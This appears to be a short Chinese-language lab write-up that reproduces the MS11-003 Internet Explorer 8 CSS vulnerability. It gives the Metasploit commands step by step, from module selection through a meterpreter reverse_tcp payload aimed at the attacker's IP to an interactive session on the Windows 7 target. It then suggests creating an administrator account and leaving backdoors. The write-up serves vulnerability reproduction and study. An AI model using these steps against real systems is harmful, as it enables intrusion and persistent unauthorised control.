0x01漏洞简介

ms11-003(windows7IE溢出攻击) 是利用IE8中对css的解析存在一个问题，导致任何访问包含非法css的页面将导致IE8崩溃重启的漏洞。

0x02环境准备

攻击机：kali Linux      IP：172.16.11.7

靶    机：Win7旗舰版  IP：172.16.11.17

0x03复现步骤

首先需要将靶机防火墙关闭

1.在kali中加载msf工具

2.搜索漏洞利用模块

命令：search ms11-

3.使用exploit/windows/browser/ms11_003_ie_css_import攻击模块

命令：use exploit/windows/browser/ms11_003_ie_css_import

显示 payloads：show payloads
选择 windows/meterpreter/reverse_tcp这一条
设置：set payload windows/meterpreter/reverse_tcp

set srvhost 172.16.11.7(攻击机ip)

set lhost 172.16.11.7(攻击机ip)

4.查看配置情况

show options

URIPATH默认为随机数，可以不设置，为了方便后面使用，在这里可任意设置一个固定值

5.以上参数配置完成后可进行攻击

命令： run （或exploit）

会生成一条攻击url，将此url复制到靶机IE浏览器地址栏中访问

同时kali中会返回如下信息：

6.出现该信息证明已经攻击成功，可以sessions命令查看会话

选择任意会话连接，即可进入靶机控制台

此时可进行进一步渗透，创建管理员账户，搭配其他工具留后门等。出现乱码时可用"chcp65001"命令更改编码。该漏洞复现完成.